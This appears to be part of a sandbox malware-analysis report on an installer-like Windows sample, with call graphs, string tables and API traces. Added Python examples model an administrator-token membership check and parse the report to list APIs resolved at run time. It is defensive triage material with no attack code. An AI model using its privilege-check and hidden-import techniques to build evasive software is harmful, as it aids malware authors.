LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50804->53767 50805->50495 50814 494e16 53765 49465c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50814->53765 50816 494e2a 53766 433dd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50816->53766 50818 494e4a 50818->50495 50819->50505 50821 457f41 50820->50821 50822 457f61 50821->50822 50823 4078f4 19 API calls 50821->50823 50825 403400 4 API calls 50822->50825 50824 457f59 50823->50824 50826 457d10 24 API calls 50824->50826 50827 457f76 50825->50827 50826->50822 50827->50521 50836->50495 50862 46c4bc 50837->50862 50840 414ae8 50841 414af6 50840->50841 50842 4034e0 4 API calls 50841->50842 50843 414b03 50842->50843 50843->50539 
50844->50549 50846 46661a 50845->50846 51065 4078f4 50846->51065 51108 42cccc 50854->51108 50857 451458 50858 451428 4 API calls 50857->50858 50859 451474 50858->50859 50861->50566 50863 414ae8 4 API calls 50862->50863 50864 46c4f0 50863->50864 50923 466898 50864->50923 50868 46c502 50869 46c511 50868->50869 50873 46c52a 50868->50873 50992 47efd0 42 API calls 50869->50992 50871 403420 4 API calls 50872 46b702 50871->50872 50872->50535 50872->50840 50874 46c571 50873->50874 50875 46c558 50873->50875 50876 46c5d6 50874->50876 50889 46c575 50874->50889 50993 47efd0 42 API calls 50875->50993 50995 42cb4c CharNextA 50876->50995 50879 46c5e5 50880 46c5e9 50879->50880 50884 46c602 50879->50884 50996 47efd0 42 API calls 50880->50996 50882 46c5bd 50994 47efd0 42 API calls 50882->50994 50883 46c626 50997 47efd0 42 API calls 50883->50997 50884->50883 50937 466a08 50884->50937 50889->50882 50889->50884 50892 46c63f 50945 403778 50892->50945 50897 46c666 50998 466a94 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50897->50998 50898 46c697 50956 42c8cc 50898->50956 50901 46c679 50904 451458 4 API calls 50901->50904 50906 46c686 50904->50906 50999 47efd0 42 API calls 50906->50999 50910 46c525 50910->50871 50924 4668b2 50923->50924 50926 42cbc0 6 API calls 50924->50926 50927 403450 4 API calls 50924->50927 50928 406bb0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50924->50928 50929 4668fb 50924->50929 51002 42caac 50924->51002 50926->50924 50927->50924 50928->50924 50930 403420 4 API calls 50929->50930 50931 466915 50930->50931 50932 414b18 50931->50932 50933 414ae8 4 API calls 50932->50933 50934 414b3c 50933->50934 50935 403400 4 API calls 50934->50935 50936 414b6d 50935->50936 50936->50868 50938 466a12 50937->50938 50939 466a25 50938->50939 51018 42cb3c CharNextA 50938->51018 50939->50883 50941 466a38 50939->50941 50943 466a42 50941->50943 50942 466a6f 50942->50883 50942->50892 50943->50942 51019 42cb3c CharNextA 50943->51019 50946 4037aa 50945->50946 50948 40377d 50945->50948 
50947 403400 4 API calls 50946->50947 50949 4037a0 50947->50949 50948->50946 50950 403791 50948->50950 50952 42c99c 50949->50952 50951 4034e0 4 API calls 50950->50951 50951->50949 50953 42c9f5 50952->50953 50954 42c9b2 50952->50954 50953->50897 50953->50898 50954->50953 51020 42cb3c CharNextA 50954->51020 51021 42c674 50956->51021 50992->50910 50993->50910 50994->50910 50995->50879 50996->50910 50997->50910 50998->50901 50999->50910 51003 403494 4 API calls 51002->51003 51004 42cabc 51003->51004 51005 403744 4 API calls 51004->51005 51009 42caf2 51004->51009 51011 42c444 IsDBCSLeadByte 51004->51011 51005->51004 51007 42cb36 51007->50924 51009->51007 51012 4037b8 51009->51012 51017 42c444 IsDBCSLeadByte 51009->51017 51011->51004 51013 403744 4 API calls 51012->51013 51014 4037c6 51013->51014 51015 4037fc 51014->51015 51016 4038a4 4 API calls 51014->51016 51015->51009 51016->51015 51017->51009 51018->50938 51019->50943 51020->50954 51024 42c67c 51021->51024 51027 42c68d 51024->51027 51025 42c6f1 51027->51025 51030 42c6ab 51027->51030 51068 407908 51065->51068 51069 407925 51068->51069 51076 4075b8 51069->51076 51072 407951 51074 4034e0 4 API calls 51072->51074 51075 407903 51074->51075 51079 4075d3 51076->51079 51077 4075e5 51077->51072 51081 4069a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51077->51081 51079->51077 51082 4076da 19 API calls 51079->51082 51083 4075ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51079->51083 51081->51072 51082->51079 51083->51079 51109 42cbc0 6 API calls 51108->51109 51110 42ccee 51109->51110 51111 42ccf6 GetFileAttributesA 51110->51111 51112 403400 4 API calls 51111->51112 51113 42cd13 51112->51113 51113->50546 51113->50857 51114->50575 51117 46a787 51115->51117 51116 46abff 51119 46ac1a 51116->51119 51120 46ac4b 51116->51120 51117->51116 51118 46a842 51117->51118 51123 403494 4 API calls 51117->51123 51122 46a863 51118->51122 51126 46a8a4 51118->51126 51124 403494 4 API calls 51119->51124 51121 403494 4 API calls 
Strings
• Incrementing shared file count (64-bit)., xrefs: 0047158C
• Same version. Skipping., xrefs: 00470CE5
• Couldn't read time stamp. Skipping., xrefs: 00470D35
• Failed to strip read-only attribute., xrefs: 00470ED3
• Installing into GAC, xrefs: 00471714
• InUn, xrefs: 0047115F
• Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
• .tmp, xrefs: 00470FB7
• -- File entry --, xrefs: 004706FB
• User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470E96
• Incrementing shared file count (32-bit)., xrefs: 004715A5
• Time stamp of existing file: (failed to read), xrefs: 00470A37
• User opted not to overwrite the existing file. Skipping., xrefs: 00470E4D
• Existing file is protected by Windows File Protection. Skipping., xrefs: 00470DEC
• Will register the file (a DLL/OCX) later., xrefs: 0047151F
• Version of existing file: (none), xrefs: 00470CFA
• Dest file exists., xrefs: 004709BB
• Existing file has a later time stamp. Skipping., xrefs: 00470DCF
• Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470CB5
• Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470CD0
• Time stamp of our file: %s, xrefs: 0047099B
• @, xrefs: 004707B0
• Version of our file: (none), xrefs: 00470AFC
• Will register the file (a type library) later., xrefs: 00471513
• Non-default bitness: 64-bit, xrefs: 004708AF
• Dest file is protected by Windows File Protection., xrefs: 004708ED
• Uninstaller requires administrator: %s, xrefs: 0047118F
• Version of existing file: %u.%u.%u.%u, xrefs: 00470B7C
• Same time stamp. Skipping., xrefs: 00470D55
• Installing the file., xrefs: 00470F09
• Dest filename: %s, xrefs: 00470894
• Skipping due to "onlyifdestfileexists" flag., xrefs: 00470EFA
                                                                                            • Time stamp of our file: (failed to read), xrefs: 004709A7
                                                                                            • , xrefs: 00470BCF, 00470DA0, 00470E1E
                                                                                            • Stripped read-only attribute., xrefs: 00470EC7
                                                                                            • Non-default bitness: 32-bit, xrefs: 004708BB
                                                                                            • Existing file is a newer version. Skipping., xrefs: 00470C02
                                                                                            • Time stamp of existing file: %s, xrefs: 00470A2B
                                                                                            • Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
                                                                                            • Version of our file: %u.%u.%u.%u, xrefs: 00470AF0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                            • API String ID: 0-4021121268
                                                                                            • Opcode ID: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                            • Instruction ID: 04e5041402f80353ef90c659d92e8d378e84d4fed116f8838aecbbc27e5febe3
                                                                                            • Opcode Fuzzy Hash: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                            • Instruction Fuzzy Hash: 31927574A0424CDFDB21DFA9C445BDDBBB5AF05304F1480ABE848A7392D7789E49CB19

                                                                                             Control-flow Graph
                                                                                             • Function at 0x42E09C (basic blocks 0x42E09C-0x42E28F). The rendered graph with its Executed/Not Executed colouring is not reproduced here.
                                                                                             • Blocks call AllocateAndInitializeSid, GetVersion, GetModuleHandleA, GetProcAddress, CheckTokenMembership, GetCurrentThread, OpenThreadToken, GetLastError, GetCurrentProcess, OpenProcessToken, GetTokenInformation, EqualSid, CloseHandle and FreeSid. With sub-authorities 0x20 and 0x220 (see the AllocateAndInitializeSid arguments below) this is a BUILTIN\Administrators membership test: CheckTokenMembership is resolved by name and used when available, otherwise the thread or process token's groups are read with GetTokenInformation and compared with EqualSid.
                                                                                            APIs
                                                                                            • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
                                                                                            • GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
                                                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
                                                                                            • FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                            • API String ID: 2252812187-1888249752
                                                                                            • Opcode ID: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                            • Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
                                                                                            • Opcode Fuzzy Hash: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                            • Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79
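                                                                                             The call sequence recorded for the function at 0x42E09C (AllocateAndInitializeSid with two sub-authorities, 0x20 and 0x220, then CheckTokenMembership, with OpenThreadToken/OpenProcessToken, GetTokenInformation and EqualSid as the fallback) is a test for membership of BUILTIN\Administrators, S-1-5-32-544. The Python below is an added example, not code from the report or from the sample: it rebuilds that SID from the visible arguments and applies the membership rule to constructed token group lists, so it runs on any platform. The identifier authority (the value at 0x499788 is not dumped) is assumed to be SECURITY_NT_AUTHORITY, and the attribute handling (SE_GROUP_ENABLED required, SE_GROUP_USE_FOR_DENY_ONLY rejected) is the documented CheckTokenMembership behaviour, assumed here for the fallback path as well since the report does not show whether it checks attributes.

```python
"""Added example: rebuild the BUILTIN\\Administrators SID that the function
at 0x42E09C constructs and apply its membership test to constructed token
group lists.  Not code from the sandbox report or from the sample."""
import struct
from typing import Iterable, List, Tuple

# Arguments visible in the AllocateAndInitializeSid call in the report:
# 2 sub-authorities, 0x20 and 0x220.  The identifier authority itself is
# not dumped; SECURITY_NT_AUTHORITY (5) is assumed.
SECURITY_NT_AUTHORITY = 5
SECURITY_BUILTIN_DOMAIN_RID = 0x20
DOMAIN_ALIAS_RID_ADMINS = 0x220

# Group attribute bits of TOKEN_GROUPS entries (winnt.h).
SE_GROUP_MANDATORY = 0x01
SE_GROUP_ENABLED_BY_DEFAULT = 0x02
SE_GROUP_ENABLED = 0x04
SE_GROUP_OWNER = 0x08
SE_GROUP_USE_FOR_DENY_ONLY = 0x10

TokenGroups = List[Tuple[bytes, int]]   # (binary SID, attributes)


def build_sid(authority: int, sub_authorities: Iterable[int]) -> bytes:
    """Binary SID: revision(1) | count(1) | authority(6, big-endian) |
    count x sub-authority(4, little-endian); the layout Windows uses."""
    subs = list(sub_authorities)
    if not 1 <= len(subs) <= 15:
        raise ValueError("a SID carries 1..15 sub-authorities")
    if not 0 <= authority < 1 << 48:
        raise ValueError("identifier authority is a 48-bit value")
    return (bytes([1, len(subs)]) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_to_string(sid: bytes) -> str:
    """Render a binary SID as S-1-5-32-544 style text."""
    if len(sid) < 8 or sid[0] != 1 or len(sid) != 8 + 4 * sid[1]:
        raise ValueError("malformed SID")
    authority = int.from_bytes(sid[2:8], "big")
    subs = struct.unpack("<%dI" % sid[1], sid[8:])
    auth_txt = str(authority) if authority < 1 << 32 else "0x%012X" % authority
    return "S-1-%s" % auth_txt + "".join("-%d" % s for s in subs)


def equal_sid(a: bytes, b: bytes) -> bool:
    """EqualSid: structural equality of two well-formed SIDs."""
    sid_to_string(a), sid_to_string(b)          # validate both
    return a == b


def is_member(groups: TokenGroups, target: bytes,
              honour_attributes: bool = True) -> bool:
    """Membership test over a TOKEN_GROUPS list.

    honour_attributes=True follows CheckTokenMembership: the SID only counts
    when the group is enabled and not marked deny-only.  False is the naive
    EqualSid loop (assumption: the report does not show whether the sample's
    fallback path looks at attributes)."""
    for sid, attributes in groups:
        if not equal_sid(sid, target):
            continue
        if not honour_attributes:
            return True
        if attributes & SE_GROUP_ENABLED and not attributes & SE_GROUP_USE_FOR_DENY_ONLY:
            return True
    return False


ADMINISTRATORS_SID = build_sid(
    SECURITY_NT_AUTHORITY, [SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS])


def is_admin_token(groups: TokenGroups) -> bool:
    return is_member(groups, ADMINISTRATORS_SID)


# Constructed token group lists (not taken from the analysed machine).
_ON = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED
EVERYONE = build_sid(1, [0])                # S-1-1-0
BUILTIN_USERS = build_sid(5, [32, 545])     # S-1-5-32-545
_COMMON = [(EVERYONE, _ON), (BUILTIN_USERS, _ON)]
# UAC-filtered token of an administrator: the group is present but deny-only.
FILTERED_ADMIN_TOKEN: TokenGroups = _COMMON + [(ADMINISTRATORS_SID, SE_GROUP_USE_FOR_DENY_ONLY)]
# The same user's elevated (linked) token.
ELEVATED_ADMIN_TOKEN: TokenGroups = _COMMON + [(ADMINISTRATORS_SID, _ON | SE_GROUP_OWNER)]

if __name__ == "__main__":
    print(sid_to_string(ADMINISTRATORS_SID), ADMINISTRATORS_SID.hex())
    print("filtered:", is_admin_token(FILTERED_ADMIN_TOKEN),
          "elevated:", is_admin_token(ELEVATED_ADMIN_TOKEN))
```

                                                                                             The practical consequence for triage: under UAC an administrator's filtered token still carries S-1-5-32-544, but deny-only, so this check answers "is the process elevated?" rather than "is the user an administrator?". The naive EqualSid loop (honour_attributes=False) returns True for the filtered token as well, which is the kind of discrepancy the fallback path can introduce.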

                                                                                             Control-flow Graph
                                                                                             • Function at 0x4502C0 (basic blocks 0x4502C0-0x450386). The rendered graph with its Executed/Not Executed colouring is not reproduced here.
                                                                                             • Blocks call GetVersion, LoadLibraryA and GetProcAddress six times: the Restart Manager exports listed below are resolved by name at run time and so do not appear in the import table.
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(00480B52), ref: 004502D3
                                                                                            • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
                                                                                            • GetProcAddress.KERNEL32(6E330000,RmStartSession), ref: 00450309
                                                                                            • GetProcAddress.KERNEL32(6E330000,RmRegisterResources), ref: 0045031E
                                                                                            • GetProcAddress.KERNEL32(6E330000,RmGetList), ref: 00450333
                                                                                            • GetProcAddress.KERNEL32(6E330000,RmShutdown), ref: 00450348
                                                                                            • GetProcAddress.KERNEL32(6E330000,RmRestart), ref: 0045035D
                                                                                            • GetProcAddress.KERNEL32(6E330000,RmEndSession), ref: 00450372
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoadVersion
                                                                                            • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                            • API String ID: 1968650500-3419246398
                                                                                            • Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                            • Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
                                                                                            • Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                            • Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C
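                                                                                             The function above resolves the Restart Manager API (RmStartSession through RmEndSession) by name via LoadLibraryA and GetProcAddress, and the function at 0x42E09C does the same for CheckTokenMembership; none of these names show up in the PE import table, which is why the report flags "Contains functionality to dynamically determine API calls". The Python below is an added example, not code from the report or from the sample: it parses the report's per-function API annotation lines and string/xref lines into records and lists the modules and export names resolved at run time. The sample input is constructed from lines on this page with shortened argument lists; skipping stale stack values in GetProcAddress's name slot (the report recovers arguments from stack slots, so a slot can hold a module name or a raw DWORD) is a heuristic of this example.

```python
"""Added example: parse the API and string annotations this report prints
per function and pull out what static import analysis misses, modules
loaded at run time and names resolved through GetProcAddress.
Not code from the sandbox report or from the sample."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One annotation line, e.g.
#   • GetProcAddress.KERNEL32(6E330000,RmStartSession), ref: 00450309
#   • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[\w.]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")
MODULE_NAME = re.compile(r"\.(dll|exe|ocx|drv)$", re.I)
LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW",
           "GetModuleHandleA", "GetModuleHandleW"}
XREF_SEP = ", xrefs: "


@dataclass
class ApiCall:
    api: str
    module: str                # module the tool attributed the export to
    args: List[str]            # argument slots as printed: hex words, '?' or strings
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # set for "Part of subcall function X" lines


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        calls.append(ApiCall(
            api=m["api"], module=m["mod"],
            args=[a.strip() for a in m["args"].split(",")] if m["args"] else [],
            ref=int(m["ref"], 16),
            subcall_of=int(m["sub"], 16) if m["sub"] else None))
    return calls


def loaded_modules(calls: List[ApiCall]) -> List[str]:
    """Modules the code loads or looks up by name at run time."""
    names = {c.args[0] for c in calls
             if c.api in LOADERS and c.args and MODULE_NAME.search(c.args[0])}
    return sorted(names, key=str.lower)


def dynamic_symbols(calls: List[ApiCall]) -> List[str]:
    """Export names passed to GetProcAddress.  A slot holding '?', a raw
    DWORD or a module name is treated as unrecovered and skipped."""
    names = set()
    for c in calls:
        if c.api != "GetProcAddress" or len(c.args) < 2:
            continue
        name = c.args[1]
        if name == "?" or HEX32.match(name) or MODULE_NAME.search(name):
            continue
        names.add(name)
    return sorted(names)


def parse_string_lines(text: str) -> Dict[str, List[int]]:
    """'• <string>, xrefs: A, B' lines -> {string: [xref addresses]}.
    The string itself may contain commas, so split on the last separator."""
    out: Dict[str, List[int]] = {}
    for line in text.splitlines():
        s = line.strip()
        if not s.startswith("•") or XREF_SEP not in s:
            continue
        body, refs = s[1:].rsplit(XREF_SEP, 1)
        out[body.strip()] = [int(r, 16) for r in refs.split(",")]
    return out


def summarise(api_text: str) -> Dict[str, object]:
    calls = parse_api_lines(api_text)
    return {"calls": len(calls), "modules": loaded_modules(calls),
            "symbols": dynamic_symbols(calls)}


# Constructed sample: lines copied from this report, argument lists shortened.
SAMPLE_APIS = """\
• AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000), ref: 0042E0D6
• GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280), ref: 0042E10C
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
• CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280), ref: 0042E127
• LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
• GetProcAddress.KERNEL32(6E330000,RmStartSession), ref: 00450309
• GetProcAddress.KERNEL32(6E330000,RmGetList), ref: 00450333
  • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
"""
SAMPLE_STRINGS = """\
• Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
• Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
• , xrefs: 00470BCF, 00470DA0, 00470E1E
"""

if __name__ == "__main__":
    print(summarise(SAMPLE_APIS))
    print(parse_string_lines(SAMPLE_STRINGS))
```

                                                                                             Run over a whole report, the "symbols" list is the set of names to diff against the sample's import directory; anything resolved only through GetProcAddress is where the interesting behaviour tends to be hidden.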

                                                                                             Control-flow Graph
                                                                                             • Function at 0x423C0C (basic blocks 0x423C0C-0x424177). The rendered graph with its Executed/Not Executed colouring is not reproduced here.
                                                                                             • Blocks call IsIconic, GetFocus, SetFocus, SendMessageA, PostMessageA, IsWindowEnabled and IsWindowVisible; the function dispatches window and focus messages and references no strings or hooked APIs.
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                            • Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
                                                                                            • Opcode Fuzzy Hash: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                            • Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09

                                                                                             Control-flow Graph
                                                                                             • Function at 0x4673A4 (basic blocks 0x4673A4-0x468ABE). The rendered graph with its Executed/Not Executed colouring is not reproduced here.
                                                                                             • Blocks call LoadBitmapA, GetSystemMenu and AppendMenuA directly and a large number of internal routines; the APIs reached through those subcalls are listed below.
APIs
  • Part of subcall function 004958CC: GetWindowRect.USER32(00000000), ref: 004958E2
• LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467773
  • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,0046778D), ref: 0041D6DB
  • Part of subcall function 00467180: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
  • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
  • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
  • Part of subcall function 00466B40: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
  • Part of subcall function 00495B50: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495B5A
  • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
  • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
  • Part of subcall function 0049581C: GetDC.USER32(00000000), ref: 0049583E
  • Part of subcall function 0049581C: SelectObject.GDI32(?,00000000), ref: 00495864
  • Part of subcall function 0049581C: ReleaseDC.USER32(00000000,?), ref: 004958B5
  • Part of subcall function 00495B40: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495B4A
• GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0213FC50,02141948,?,?,02141978,?,?,021419C8,?), ref: 004683FD
• AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046840E
• AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468426
  • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
Strings
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
• String ID: $(Default)$STOPIMAGE$%H
• API String ID: 3231140908-2624782221
• Opcode ID: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
• Instruction ID: 1a3196d4b4984e68f3522cc8585b165e0004af585c118fa25862355e2bbb38c0
• Opcode Fuzzy Hash: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
